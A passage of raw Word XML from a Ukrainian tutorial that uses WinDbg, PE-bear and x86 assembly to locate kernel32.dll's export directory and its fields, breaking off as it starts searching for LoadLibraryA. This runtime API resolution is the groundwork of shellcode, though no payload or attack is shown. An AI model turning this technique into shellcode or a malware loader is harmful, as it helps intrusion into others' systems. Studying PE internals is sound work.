          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">dt -r _IMAGE_NT_HEADERS64 </w:t>
      </w:r>
      <w:r w:rsidR="00705B64" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>kernel32</w:t>
      </w:r>
      <w:r w:rsidR="00CD3C9B" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+f0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78C93E2E" w14:textId="2C9045CE" w:rsidR="000C55AF" w:rsidRDefault="00D21977" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="35D2C88D" wp14:editId="7264A575">
            <wp:extent cx="5295238" cy="2790476"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="2144746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468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0F8C" w14:textId="77777777" w:rsidR="00AA19DC" w:rsidRDefault="00744FEF" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="004B1235">
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="004B1235">
        <w:t xml:space="preserve">18 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">бачимо </w:t>
      </w:r>
      <w:r>
        <w:t>додатковий заголовок</w:t>
      </w:r>
      <w:r w:rsidR="004B1235">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5516D79B" w14:textId="43264660" w:rsidR="00744FEF" w:rsidRPr="00365E42" w:rsidRDefault="006C510D" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">За офсетом </w:t>
      </w:r>
      <w:r w:rsidRPr="00B82CD3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>x</w:t>
      </w:r>
      <w:r w:rsidRPr="00B82CD3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">70 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">від </w:t>
      </w:r>
      <w:r w:rsidR="00B82CD3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>нього</w:t>
      </w:r>
      <w:r w:rsidR="0093594C" w:rsidRPr="007A7FC7">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00B82CD3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> бачимо </w:t>
      </w:r>
      <w:r w:rsidR="001C691E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">масив </w:t>
      </w:r>
      <w:r w:rsidR="00535CC4">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DataDirectory</w:t>
      </w:r>
      <w:r w:rsidR="00DD51B3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, що містить відносні віртуальні адреси </w:t>
      </w:r>
      <w:r w:rsidR="00DD51B3" w:rsidRPr="00DD51B3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00DD51B3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RVA</w:t>
      </w:r>
      <w:r w:rsidR="00DD51B3" w:rsidRPr="00DD51B3">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="00AD781F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">директорій </w:t>
      </w:r>
      <w:r w:rsidR="005106A6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>експорту, імпорту</w:t>
      </w:r>
      <w:r w:rsidR="00AD781F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>, ресурсів і т.д</w:t>
      </w:r>
      <w:r w:rsidR="00AA19DC">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>. Пер</w:t>
      </w:r>
      <w:r w:rsidR="00FB16E5">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">ший елемент </w:t>
      </w:r>
      <w:r w:rsidR="00A50C17">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">цього масиву – це </w:t>
      </w:r>
      <w:r w:rsidR="00CC558E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RVA</w:t>
      </w:r>
      <w:r w:rsidR="00CC558E" w:rsidRPr="00CC558E">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0082048D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">шуканої </w:t>
      </w:r>
      <w:r w:rsidR="00E727E4" w:rsidRPr="00E727E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Export Directory</w:t>
      </w:r>
      <w:r w:rsidR="00365E42">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2691DE" w14:textId="4737E482" w:rsidR="008F738A" w:rsidRDefault="008F738A" w:rsidP="00774391">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="464618A8" wp14:editId="0A2CBF2C">
            <wp:extent cx="5438095" cy="1104762"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="245057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576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751" w14:textId="77777777" w:rsidR="00D4174D" w:rsidRDefault="00D4174D" w:rsidP="00591974">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7589ACC0" w14:textId="5055307F" w:rsidR="004C2C03" w:rsidRDefault="00BF647E" w:rsidP="00591974">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF647E">
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidR="00E0563B" w:rsidRPr="00E0563B">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="004C2C03">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Проте якщо </w:t>
      </w:r>
      <w:r w:rsidR="00520C3F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">спробувати </w:t>
      </w:r>
      <w:r w:rsidR="00A4650C">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">відобразити структуру </w:t>
      </w:r>
      <w:r w:rsidR="00A4650C" w:rsidRPr="00E727E4">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Export Directory</w:t>
      </w:r>
      <w:r w:rsidR="00E41818">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="000C60C6">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>WinDbg</w:t>
      </w:r>
      <w:r w:rsidR="000C60C6" w:rsidRPr="000C60C6">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000C60C6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">не зможе </w:t>
      </w:r>
      <w:r w:rsidR="00144D8F">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>це зробити через відсутність символів</w:t>
      </w:r>
      <w:r w:rsidR="007F5B29">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38168DFC" w14:textId="38357301" w:rsidR="00591974" w:rsidRPr="00E531BB" w:rsidRDefault="000C55AF" w:rsidP="00591974">
      <w:pPr>
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>dt _IMAGE_EXPORT_DIRECTORY</w:t>
      </w:r>
      <w:r w:rsidR="00705B64" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> kernel32</w:t>
      </w:r>
      <w:r w:rsidR="00591974" w:rsidRPr="00E531BB">
        <w:rPr>
          <w:rStyle w:val="a7"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>+99080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7748E1" w14:textId="48321314" w:rsidR="005718CE" w:rsidRDefault="00AA446B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4412CF9D" wp14:editId="20B3A2B6">
            <wp:extent cx="5314286" cy="485714"/>
            <wp:effectExtent l="0" t="0" r="1270" b="0"/>
            <wp:docPr id="1300445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450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36BA" w14:textId="77777777" w:rsidR="00CC71A4" w:rsidRPr="00683F4D" w:rsidRDefault="00CC71A4">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="50DB1A93" w14:textId="0A5A05CC" w:rsidR="000E35FB" w:rsidRPr="00EB5452" w:rsidRDefault="006A1005">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Для подального аналізу використаємо </w:t>
      </w:r>
      <w:hyperlink r:id="rId18" w:history="1">
        <w:r w:rsidR="00AF3688" w:rsidRPr="00DC349E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>PE</w:t>
        </w:r>
        <w:r w:rsidR="00392D5E" w:rsidRPr="00DC349E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>-</w:t>
        </w:r>
        <w:r w:rsidR="00392D5E" w:rsidRPr="00DC349E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>b</w:t>
        </w:r>
        <w:r w:rsidR="00AF3688" w:rsidRPr="00DC349E">
          <w:rPr>
            <w:rStyle w:val="a4"/>
            <w:lang w:val="en-US"/>
          </w:rPr>
          <w:t>ear</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="00AF3688" w:rsidRPr="00DC349E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="508F54BA" w14:textId="20A0B8B7" w:rsidR="00F41370" w:rsidRPr="0038470B" w:rsidRDefault="00F41370">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="511AC1FD" wp14:editId="1B763374">
            <wp:extent cx="6645910" cy="2697480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="1887863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3824" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill rotWithShape="1">
                    <a:blip r:embed="rId19"/>
                    <a:srcRect b="35411"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="664591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61383" w14:textId="0141A30A" w:rsidR="00FC19D6" w:rsidRPr="00EB5452" w:rsidRDefault="005614CD" w:rsidP="00FC19D6">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>Роз</w:t>
      </w:r>
      <w:r w:rsidR="00FC19D6">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>рахуємо офсети для цікавих полів:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="731C0DB9" w14:textId="77777777" w:rsidR="005A6C9C" w:rsidRDefault="005A6C9C" w:rsidP="005A6C9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Bas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x97a90 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1647721D" w14:textId="0567F35F" w:rsidR="005A6C9C" w:rsidRPr="007B0B1D" w:rsidRDefault="005A6C9C" w:rsidP="005A6C9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>NumberOfFunctions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97a9</w:t>
      </w:r>
      <w:r w:rsidR="00275211">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> - 0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80 = 0x1</w:t>
      </w:r>
      <w:r w:rsidR="00D8624E">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>8</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DF17868" w14:textId="77777777" w:rsidR="005A6C9C" w:rsidRDefault="005A6C9C" w:rsidP="005A6C9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfFunctions</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">a9c - </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:r w:rsidRPr="003C7AC3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43A51EA0" w14:textId="77777777" w:rsidR="005A6C9C" w:rsidRDefault="005A6C9C" w:rsidP="005A6C9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfNam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26E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">aa0 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3094A8BB" w14:textId="77777777" w:rsidR="005A6C9C" w:rsidRDefault="005A6C9C" w:rsidP="005A6C9C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>AddressOfNameOrdinals</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">aa4 - </w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x97</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidRPr="00326E3D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 0x24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349C76D4" w14:textId="77777777" w:rsidR="002C3BF2" w:rsidRPr="00091717" w:rsidRDefault="002C3BF2">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="51E9F992" w14:textId="77777777" w:rsidR="00F05620" w:rsidRDefault="00F05620">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="182527BD" w14:textId="416B7165" w:rsidR="00CB118B" w:rsidRPr="00F05620" w:rsidRDefault="00CB118B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Отже, пошук </w:t>
      </w:r>
      <w:r w:rsidR="00661247" w:rsidRPr="00661247">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Export Directory </w:t>
      </w:r>
      <w:r w:rsidR="00AF222D">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">та її полів </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>буде виглядати таким чином:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE84A7E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33ABF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Get info from kernel32.dll export directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="237E7C0C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33AB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Kernel32]     </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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kernel32.dll base (DOS header)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46699BA5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33AB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bx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A33ABF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x3c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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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NT header offset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C84E720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33AB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dd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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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NT header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A39CD3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33AB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bx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A33ABF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x18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A33ABF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x70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   </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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Export Directory RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC44191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33AB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dd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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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Export Directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00141559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1D839741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33AB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A33ABF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</w:p>
    <w:p w14:paraId="5C4E5AA0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33AB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cx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A33ABF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x10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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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Base (ordinals of functions start from this number)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F79493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33AB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iBase],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</w:p>
    <w:p w14:paraId="690BAD2E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7FFFBF7C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33AB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cx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A33ABF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x18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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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NumberOfNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1161E8F8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lastRenderedPageBreak/>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33AB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cNames],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</w:p>
    <w:p w14:paraId="74331B60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67AE354C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33AB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cx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A33ABF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x1c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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfFunctions RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="213F9587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33AB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dd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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfFunctions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F582B9E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33AB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Functions],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</w:p>
    <w:p w14:paraId="148E227E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2BCE0A4D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33AB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cx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A33ABF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x20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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfNames RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A6DED3D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33AB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dd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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfNames</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0632F8A8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33AB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Names],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</w:p>
    <w:p w14:paraId="6C7A010C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1F871628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33AB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cx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A33ABF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x24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]          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfNameOrdinals RVA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C69CC7B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33AB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dd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          </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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AddressOfNameOrdinals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21D65D42" w14:textId="77777777" w:rsidR="00A33ABF" w:rsidRPr="00A33ABF" w:rsidRDefault="00A33ABF" w:rsidP="00A33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33ABF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A33ABF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NameOrdinals], </w:t>
      </w:r>
      <w:r w:rsidRPr="00A33ABF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</w:p>
    <w:p w14:paraId="68EA4E75" w14:textId="77777777" w:rsidR="006771C7" w:rsidRPr="00A33ABF" w:rsidRDefault="006771C7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="ru-UA"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2D75BA5F" w14:textId="77777777" w:rsidR="00BD0DF7" w:rsidRDefault="00BD0DF7">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58CE6F32" w14:textId="1C926EE8" w:rsidR="00BD0DF7" w:rsidRPr="00106816" w:rsidRDefault="00315127">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r w:rsidR="002D30ED" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="002D30ED" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Пошук</w:t>
      </w:r>
      <w:r w:rsidR="002D30ED" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C86BB5" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>індексу назви</w:t>
      </w:r>
      <w:r w:rsidR="002D30ED" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F74E7E" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="009913CC" w:rsidRPr="00106816">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19191EC7" w14:textId="32C3FD26" w:rsidR="00D96C4B" w:rsidRPr="0018255F" w:rsidRDefault="00691C99">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">3.1. </w:t>
      </w:r>
      <w:r w:rsidR="004437E0">
        <w:rPr>
          <w:lang w:val="uk-UA"/>
        </w:rPr>
        <w:t xml:space="preserve">Знайдемо </w:t>
      </w:r>
      <w:r w:rsidR="00852D9D">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LoadLibraryA</w:t>
      </w:r>
      <w:r w:rsidR="00852D9D" w:rsidRPr="00D7340F">
        <w:rPr>
